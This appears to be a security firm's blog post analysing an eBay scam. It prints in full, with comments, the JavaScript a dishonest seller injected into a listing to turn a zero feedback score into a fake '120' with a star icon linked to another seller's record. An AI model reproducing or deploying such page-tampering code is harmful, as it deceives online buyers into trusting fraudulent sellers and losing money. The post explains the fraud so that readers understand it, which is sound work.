Blog

• a seller who is new to eBay with no track record of ever selling anything, or
• an eBay "Power Seller" with at least 120 unique happy previous customers?

The seller with the proven track record of happy customers would surely put you more at ease over the new seller, and your gut feel may swing your decision to purchase from the reputable seller over his competitor. After all, eBay is nothing more than an intermediary for strangers to buy and sell from each other, so a good verifiable reputation does wonders for an eBay merchant.

But what happens when the yardstick measuring trust, an important currency on a platform inherently used by strangers, is gamed and artificially inflated? Yesterday, we picked up a story on an eBay Javascript hack that would turn an eBay merchant's ID and rating from looking like this:

To this:

The incident has since been reported to eBay and the listing has been yanked, and the dishonest merchant canned. Surprisingly enough, this dodgy piece of code was pretty straightforward and made no attempts to hide itself. Let's take a quick look at the offending line of code:

// First, get all links on page
var nodes = document.body.getElementsByTagName('A');  

// For each link on the page,
for( var i =
  0;  i <  nodes.length; i++ ) {         
    
// If the text of that link is "0" (zero),
 if (nodes[i].innerHTML == '0') {             
        
  // Then change it from "0" to "120" and include the nice 
  // blue eBay star reserved for sellers with feedbacks of 100-499  
  
  nodes[i].innerHTML = '120' +            
  '<img align="absmiddle" border="0" height="25" width="25" 
  alt="Feedback score is 100 to 499" 
  src=http://pics.ebaystatic.com/aw/pics/uk/icon/iconTealStar_25x25.gif>'; 

  // And link it to another seller who actually has that many positive feedbacks
   nodes[i].href = 'http://feedback.ebay.com/ws/eBayISAPI.dll[REMOVED]'; 

 }; 
};  

We have been closely monitoring Web 2 dot uh-oh hacks as such, and this is a good example of how contrary to popular belief, an effective and profitable scam does not need to be crafted with smoke screens to evade FBI or CIA agents (as much as Hollywood might want you to believe), it just needs to be good enough to fool the average Internet shopper. In our latest Security Trends Report, we noted the lowered barrier to entry for would-be non-technical fraudsters with our discovery of a significant increase in the number of phishing kits (phishing kits are toolkits made for non-technical individuals to set up their own phish sites).

This real-world incident on eBay reminds us that a fraudster armed with a basic understanding of Javascript, can make tidy sum of £670.00, one netizen at a time.

Just for laughs, at £670.00 a pop and one victim a day, assuming a 5 day work week (even scammers don't work on weekends), translates to a tidy tax-free grand total of £174,200.00 (US $343,644.34) a year. (Don't get any ideas!)